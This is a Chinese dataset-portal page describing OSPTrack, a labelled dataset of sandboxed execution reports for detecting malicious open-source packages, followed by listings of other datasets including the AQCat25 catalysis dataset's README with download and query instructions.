five

OSPTrack|开源软件供应链安全数据集|恶意软件检测数据集

收藏
arXiv2024-11-22 更新2024-11-26 收录
开源软件供应链安全
恶意软件检测
下载链接:
https://github.com/ossf/package-analysis
下载链接
链接失效反馈
资源简介:
OSPTrack是由格拉斯哥大学创建的一个标签化数据集,专注于模拟开源软件包的执行过程。该数据集涵盖了多个生态系统,包括npm、pypi、crates.io、nuget和packagist,共包含9,461个软件包报告,其中1,962个为恶意软件包。数据集通过在隔离环境中捕获软件包和库执行期间生成的特征,如文件、套接字、命令和DNS记录,来帮助识别恶意指示器。数据集的创建过程包括多进程分析、报告解析和特征提取,旨在解决开源软件供应链安全中的漏洞检测问题,特别是在源代码访问受限的情况下。
提供机构:
格拉斯哥大学
创建时间:
2024-11-22
AI搜集汇总
数据集介绍
main_image_url
构建方式
OSPTrack数据集的构建基于对开源软件包在模拟环境中的执行过程进行详细监控。研究团队利用package-analysis工具,在隔离的沙箱环境中模拟了多个生态系统(如npm、pypi、crates.io、nuget和packagist)中的软件包执行。通过这种方式,数据集捕获了软件包在运行时的静态和动态特征,包括文件操作、套接字连接、命令执行和DNS记录等。此外,数据集还整合了来自BigQuery的公开数据,以确保样本的多样性和覆盖面。最终,通过解析生成的报告并提取特征,构建了一个包含9,461个软件包报告的全面数据集,其中1,962个为恶意软件包。
特点
OSPTrack数据集的一个显著特点是其丰富的特征集和详细的标签信息。数据集不仅包含了静态代码分析中常见的特征,还引入了运行时动态特征,如网络交互和系统调用,这使得检测方法更加全面和精确。此外,数据集的标签不仅区分了恶意和良性软件包,还进一步细分为多种攻击类型,如数据泄露、恶意命令执行等,提供了更为细致的分析基础。这种多维度的特征和详细的标签使得OSPTrack成为研究开源软件供应链安全的重要资源。
使用方法
OSPTrack数据集适用于多种研究场景,特别是在开源软件供应链安全领域。研究者可以利用该数据集训练机器学习模型,以区分良性与恶意软件包,并识别运行时中的潜在漏洞。数据集的详细标签和多维度特征支持监督学习和无监督学习方法,有助于开发高效的检测算法。此外,数据集的多样性使得研究者能够进行跨生态系统的比较分析,进一步理解不同环境中恶意软件包的行为模式。通过这些分析,研究者可以提出更有效的防御策略,提升开源软件供应链的整体安全性。
背景与挑战
背景概述
OSPTrack数据集由格拉斯哥大学的Zhuoran Tan、Christos Anagnostopoulos和Jeremy Singer等人创建,旨在解决开源软件(OSS)供应链安全中的运行时特征缺失问题。该数据集于2024年发布,涵盖了多个生态系统,包括npm、pypi、crates.io、nuget和packagist,捕捉了软件包和库在隔离环境中的执行特征。OSPTrack数据集包含9,461个包报告,其中1,962个为恶意包,具有静态和动态特征,如文件、套接字、命令和DNS记录。该数据集通过详细的子标签标注攻击类型,有助于在源代码访问受限时识别恶意指示器,并支持运行时的有效检测方法。
当前挑战
OSPTrack数据集面临的挑战主要包括:1) 解决领域问题中的挑战,如在复杂系统中嵌入的OSS的运行时特征捕捉;2) 构建过程中遇到的挑战,如模拟执行中某些包因依赖缺失而无法分析,以及某些包导致模拟过程卡顿,影响后续包的分析。此外,由于源代码不可用,模拟场景无法完全捕捉注入过程,且部分恶意包因超时设置而被排除在数据集之外。未来计划通过定期更新数据集,以包含更多样化和广泛的恶意报告。
常用场景
经典使用场景
OSPTrack数据集的经典使用场景主要集中在开源软件供应链安全领域,特别是在检测恶意软件包的运行时行为。通过模拟多个生态系统中的软件包执行,该数据集捕捉了静态和动态特征,如文件操作、网络套接字、命令执行和DNS记录。这些特征的详细标注使得研究人员能够开发和验证基于机器学习的恶意软件检测模型,尤其是在源代码访问受限的情况下。
实际应用
在实际应用中,OSPTrack数据集可用于开发和部署实时恶意软件检测系统,特别是在开源软件供应链管理中。例如,企业可以使用该数据集训练的模型来监控和分析其软件包的运行时行为,及时发现并阻止潜在的恶意活动。此外,该数据集还可用于教育和培训,帮助安全专业人员更好地理解和应对复杂的供应链攻击。
衍生相关工作
OSPTrack数据集的发布激发了一系列相关研究工作,特别是在开源软件供应链安全领域。例如,一些研究者利用该数据集开发了新的机器学习模型,以提高恶意软件检测的准确性和效率。此外,还有研究探讨了如何利用OSPTrack数据集进行跨生态系统的恶意软件行为比较分析,以及如何构建基于图的表示学习模型来更好地捕捉和理解复杂的攻击模式。
以上内容由AI搜集并总结生成
用户留言
有没有相关的论文或文献参考?
这个数据集是基于什么背景创建的?
数据集的作者是谁?
能帮我联系到这个数据集的作者吗?
这个数据集如何下载?
点击留言
数据主题
具身智能
数据集  4099个
机构  8个
大模型
数据集  439个
机构  10个
无人机
数据集  37个
机构  6个
指令微调
数据集  36个
机构  6个
蛋白质结构
数据集  50个
机构  8个
空间智能
数据集  21个
机构  5个
5,000+
优质数据集
54 个
任务类型
进入经典数据集
热门数据集

aqcat25

<h1 align="center" style="font-size: 36px;"> <span style="color: #FFD700;">AQCat25 Dataset:</span> Unlocking spin-aware, high-fidelity machine learning potentials for heterogeneous catalysis </h1> ![datset_schematic](https://cdn-uploads.huggingface.co/production/uploads/67256b7931376d3bacb18de0/W1Orc_AmSgRez5iKH0qjC.jpeg) This repository contains the **AQCat25 dataset**. AQCat25-EV2 models can be accessed [here](https://huggingface.co/SandboxAQ/aqcat25-ev2). The AQCat25 dataset provides a large and diverse collection of **13.5 million** DFT calculation trajectories, encompassing approximately 5K materials and 47K intermediate-catalyst systems. It is designed to complement existing large-scale datasets by providing calculations at **higher fidelity** and including critical **spin-polarized** systems, which are essential for accurately modeling many industrially relevant catalysts. Please see our [website](https://www.sandboxaq.com/aqcat25) and [paper](https://cdn.prod.website-files.com/622a3cfaa89636b753810f04/68ffc1e7c907b6088573ba8c_AQCat25.pdf) for more details about the impact of the dataset and [models](https://huggingface.co/SandboxAQ/aqcat25-ev2). ## 1. AQCat25 Dataset Details This repository uses a hybrid approach, providing lightweight, queryable Parquet files for each split alongside compressed archives (`.tar.gz`) of the raw ASE database files. More details can be found below. ### Queryable Metadata (Parquet Files) A set of Parquet files provides a "table of contents" for the dataset. They can be loaded directly with the `datasets` library for fast browsing and filtering. Each file contains the following columns: | Column Name | Data Type | Description | Example | | :--- | :--- | :--- | :--- | | `frame_id` | string | **Unique ID for this dataset**. Formatted as `database_name::index`. | `data.0015.aselmdb::42` | | `adsorption_energy`| float | **Key Target**. The calculated adsorption energy in eV. | -1.542 | | `total_energy` | float | The raw total energy of the adslab system from DFT (in eV). | -567.123 | | `fmax` | float | The maximum force magnitude on any single atom in eV/Å. | 0.028 | | `is_spin_off` | boolean | `True` if the system is non-magnetic (VASP ISPIN=1). | `false` | | `mag` | float | The total magnetization of the system (µB). | 32.619 | | `slab_id` | string | Identifier for the clean slab structure. | `mp-1216478_001_2_False` | | `adsorbate` | string | SMILES or chemical formula of the adsorbate. | `*NH2N(CH3)2` | | `is_rerun` | boolean | `True` if the calculation is a continuation. | `false` | | `is_md` | boolean | `True` if the frame is from a molecular dynamics run. | `false` | | `sid` | string | The original system ID from the source data. | `vadslabboth_82` | | `fid` | integer | The original frame index (step number) from the source VASP calculation. | 0 | --- #### Understanding `frame_id` and `fid` | Field | Purpose | Example | | :--- | :--- | :--- | | `fid` | **Original Frame Index**: This is the step number from the original VASP relaxation (`ionic_steps`). It tells you where the frame came from in its source simulation. | `4` (the 5th frame of a specific VASP run) | | `frame_id` | **Unique Dataset Pointer**: This is a new ID created for this specific dataset. It tells you exactly which file (`data.0015.aselmdb`) and which row (`101`) to look in to find the full atomic structure. | `data.0015.aselmdb::101` | --- ## Downloadable Data Archives The full, raw data for each split is available for download in compressed `.tar.gz` archives. The table below provides direct download links. The queryable Parquet files for each split can be loaded directly using the `datasets` library as shown in the "Example Usage" section. The data currently available for download (totaling ~11.1M frames, as listed in the table below) is the initial dataset version (v1.0) released on September 10, 2025. The 13.5M frame count mentioned in our paper and the introduction includes additional data used to rebalance non-magnetic element systems and add a low-fidelity spin-on dataset. These new data splits will be added to this repository soon. | Split Name | Structures | Archive Size | Download Link | | :--- | :--- | :--- | :--- | | ***In-Domain (ID)*** | | | | | Train | `7,386,750` | `23.8 GB` | [`train_id.tar.gz`](https://huggingface.co/datasets/SandboxAQ/aqcat25-dataset/resolve/main/train_id.tar.gz) | | Validation | `254,498` | `825 MB` | [`val_id.tar.gz`](https://huggingface.co/datasets/SandboxAQ/aqcat25-dataset/resolve/main/val_id.tar.gz) | | Test | `260,647` | `850 MB` | [`test_id.tar.gz`](https://huggingface.co/datasets/SandboxAQ/aqcat25-dataset/resolve/main/test_id.tar.gz) | | Slabs | `898,530` | `2.56 GB` | [`id_slabs.tar.gz`](https://huggingface.co/datasets/SandboxAQ/aqcat25-dataset/resolve/main/id_slabs.tar.gz) | | ***Out-of-Distribution (OOD) Validation*** | | | | | OOD Ads (Val) | `577,368` | `1.74 GB` | [`val_ood_ads.tar.gz`](https://huggingface.co/datasets/SandboxAQ/aqcat25-dataset/resolve/main/val_ood_ads.tar.gz) | | OOD Materials (Val) | `317,642` | `963 MB` | [`val_ood_mat.tar.gz`](https://huggingface.co/datasets/SandboxAQ/aqcat25-dataset/resolve/main/val_ood_mat.tar.gz) | | OOD Both (Val) | `294,824` | `880 MB` | [`val_ood_both.tar.gz`](https://huggingface.co/datasets/SandboxAQ/aqcat25-dataset/resolve/main/val_ood_both.tar.gz) | | OOD Slabs (Val) | `28,971` | `83 MB` | [`val_ood_slabs.tar.gz`](https://huggingface.co/datasets/SandboxAQ/aqcat25-dataset/resolve/main/val_ood_slabs.tar.gz) | | ***Out-of-Distribution (OOD) Test*** | | | | | OOD Ads (Test) | `346,738` | `1.05 GB` | [`test_ood_ads.tar.gz`](https://huggingface.co/datasets/SandboxAQ/aqcat25-dataset/resolve/main/test_ood_ads.tar.gz) | | OOD Materials (Test) | `315,931` | `993 MB` | [`test_ood_mat.tar.gz`](https://huggingface.co/datasets/SandboxAQ/aqcat25-dataset/resolve/main/test_ood_mat.tar.gz) | | OOD Both (Test) | `355,504` | `1.1 GB` | [`test_ood_both.tar.gz`](https://huggingface.co/datasets/SandboxAQ/aqcat25-dataset/resolve/main/test_ood_both.tar.gz) | | OOD Slabs (Test) | `35,936` | `109 MB` | [`test_ood_slabs.tar.gz`](https://huggingface.co/datasets/SandboxAQ/aqcat25-dataset/resolve/main/test_ood_slabs.tar.gz) | --- ## 2. Dataset Usage Guide This guide outlines the recommended workflow for accessing and querying the AQCat25 dataset. ### 2.1 Initial Setup Before you begin, you need to install the necessary libraries and authenticate with Hugging Face. This is a one-time setup. ```bash pip install datasets pandas ase tqdm requests huggingface_hub ase-db-backends ``` **1. Create a Hugging Face Account:** If you don't have one, create an account at [huggingface.co](https://huggingface.co/join). **2. Create an Access Token:** Navigate to your **Settings -> Access Tokens** page or click [here](https://huggingface.co/settings/tokens). Create a new token with at least **`read`** permissions. Copy this token to your clipboard. **3. Log in via the Command Line:** Open your terminal and run the following command: ```bash hf auth login ``` ### 2.2 Get the Helper Scripts You may copy the scripts directly from this repository, or download them by running the following in your local python environment: ```python from huggingface_hub import snapshot_download snapshot_download( repo_id="SandboxAQ/aqcat25", repo_type="dataset", allow_patterns=["scripts/*", "README.md"], local_dir="./aqcat25" ) ``` This will create a local folder named aqcat25 containing the scripts/ directory. ### 2.3 Download Desired Dataset Splits Data splits may be downloaded directly via the Hugging Face UI, or via the `download_split.py` script (found in `aqcat25/scripts/`). ```bash python aqcat25/scripts/download_split.py --split val_id ``` This will download `val_id.tar.gz` and extract it to a new folder named `aqcat_data/val_id/`. ### 2.4 Query the Dataset Use the `query_aqcat.py` script to filter the dataset and extract the specific atomic structures you need. It first queries the metadata on the Hub and then extracts the full structures from your locally downloaded files. **Example 1: Find all CO and OH structures in the test set:** ```bash python aqcat25/scripts/query_aqcat.py \ --split test_id \ --adsorbates "*CO" "*OH" \ --data-root ./aqcat_data/test_id ``` **Example 2: Find structures on metal slabs with low adsorption energy:** ```bash python aqcat25/scripts/query_aqcat.py \ --split val_ood_both \ --max-energy -2.0 \ --material-type nonmetal \ --magnetism magnetic \ --data-root ./aqcat_data/val_ood_both \ --output-file low_energy_metals.extxyz ``` **Example 3: Find CO on slabs containing both Ni AND Se with adsorption energy between -2.5 and -1.5 eV with a miller index of 011** ```bash python aqcat25/scripts/query_aqcat.py \ --split val_ood_ads \ --adsorbates "*COCH2OH" \ --min-energy -2.5 \ --max-energy -1.5 \ --contains-elements "Ni" "Se" \ --element-filter-mode all \ --facet 011 \ --data-root ./aqcat_data/val_ood_ads \ --output-file COCH2OH_on_ni_and_se.extxyz ``` --- ## 3. How to Cite If you use the AQCat25 dataset or the models in your research, please cite the following paper: ``` Omar Allam, Brook Wander, & Aayush R. Singh. (2025). AQCat25: Unlocking spin-aware, high-fidelity machine learning potentials for heterogeneous catalysis. arXiv preprint arXiv:XXXX.XXXXX. ``` ### BibTeX Entry ```bibtex @article{allam2025aqcat25, title={{AQCat25: Unlocking spin-aware, high-fidelity machine learning potentials for heterogeneous catalysis}}, author={Allam, Omar and Wander, Brook and Singh, Aayush R}, journal={arXiv preprint arXiv:2510.22938}, year={2025}, eprint={2510.22938}, archivePrefix={arXiv}, primaryClass={cond-mat.mtrl-sci} } ```

魔搭社区 收录

OpenSonarDatasets

OpenSonarDatasets是一个致力于整合开放源代码声纳数据集的仓库,旨在为水下研究和开发提供便利。该仓库鼓励研究人员扩展当前的数据集集合,以增加开放源代码声纳数据集的可见性,并提供一个更容易查找和比较数据集的方式。

github 收录

resume-conversations-llm-training

这是一个高质量的职业对话数据集,适用于构建能够理解简历、职业和职业成长的AI。数据集以结构化的JSONL格式提供,包含关于职业发展、技术趋势和专业技能的现实问答,非常适合开发者和AI实践者用于聊天机器人、职业咨询工具或LLM微调。

huggingface 收录

emotions-dataset

情绪数据集是一个精心策划的文本数据集,包含131,306个文本条目,标注了13种不同的情绪,如快乐、悲伤、中性、愤怒等。该数据集旨在提升情感分类、情感分析和自然语言处理的能力,适用于构建富有同情心的聊天机器人、心理健康工具、社交媒体分析器等。数据集文件大小为7.41MB,便于在边缘设备和大型项目中使用。

huggingface 收录

VEDAI

用于训练YOLO模型的VEDAI数据集,包含图像和标签,用于目标检测和跟踪。

github 收录